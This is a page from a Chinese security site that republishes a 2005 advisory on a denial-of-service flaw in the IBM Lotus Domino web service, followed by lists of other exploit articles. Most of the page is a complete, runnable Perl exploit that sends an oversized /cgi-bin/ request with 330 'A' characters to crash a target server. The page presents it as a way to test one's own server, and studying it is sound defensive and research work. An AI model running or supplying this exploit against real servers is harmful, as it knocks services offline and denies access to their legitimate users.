首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
IBM Lotus Domino Server Web Service DoS (Exploit)
来源:karakorsankara@hotmail.com 作者:Karak0rsan 发布时间:2005-04-11  

IBM Lotus Domino Server Web Service DoS (Exploit)

Summary
As published earlier, a vulnerability in Lotus Domino Server web service allows attackers to crash the service, thereby preventing legitimate access. For more information see: IBM Lotus Domino Server Web Service DoS Vulnerability. The following exploit code can be used to test your server for the mentioned vulnerability.

Credit:
The information has been provided by Karak0rsan.

Details
Exploit Code:
#IBM Lotus Domino Server DoS Exploit
#Discovered by iDEFENSE
#Coded bY ++Karak0rsan++
#Usage:perl exp.pl [target]
#Greetz:"d0gma.org",phalaposher,r3d_b4r0n,L4M3R,RazoR,neset,emre and all my friends
#Thanx to hurby for do everything until now...

$target=$ARGV[0];
$string="A" x 330;

if(!$ARGV[0]){
print "Lotus Domino Server DoS Exploit\n";
print "Coded by ++Karak0rsan++\n";
print "Usage:perl $0 [target]\n";
}

use IO::Socket;
$socket = new IO::Socket::INET( PeerAddr => $target,
PeerPort => 80,
Proto => 'tcp',
Type => SOCK_STREAM, );
close($socket);
if($socket){
print "[+]Attacking...\n";
}

use IO::Socket;
$socket1 = new IO::Socket::INET( PeerAddr => $target,
PeerPort => 80,
Proto => 'tcp',
Type => SOCK_STREAM, ) or die "Couldnt connect to server!\n";
print $socket1 "GET /cgi-bin/$string HTTP/1.0\r\n";
close($socket1);

print "Attack has been completed\n";
exit();



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PunBB <= v1.2.4 change_emai
·Microsoft Jet Database Engine
·Linux kernel 2.4/2.6 Bluetooth
·Microsoft Jet Database Engine
·phpBB Calendar Pro catergory P
·Microsoft Internet Explorer DH
·ArGoSoft FTP Server Buffer Ove
·Oracle Database Server MDSYS.M
·Cyrus IMAP Server Preauthentif
·Oracle Database PL/SQL Stateme
·MailEnable SMTPd DoS (Exploit)
·Salim Gasmi GLD Postfix Greyli
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved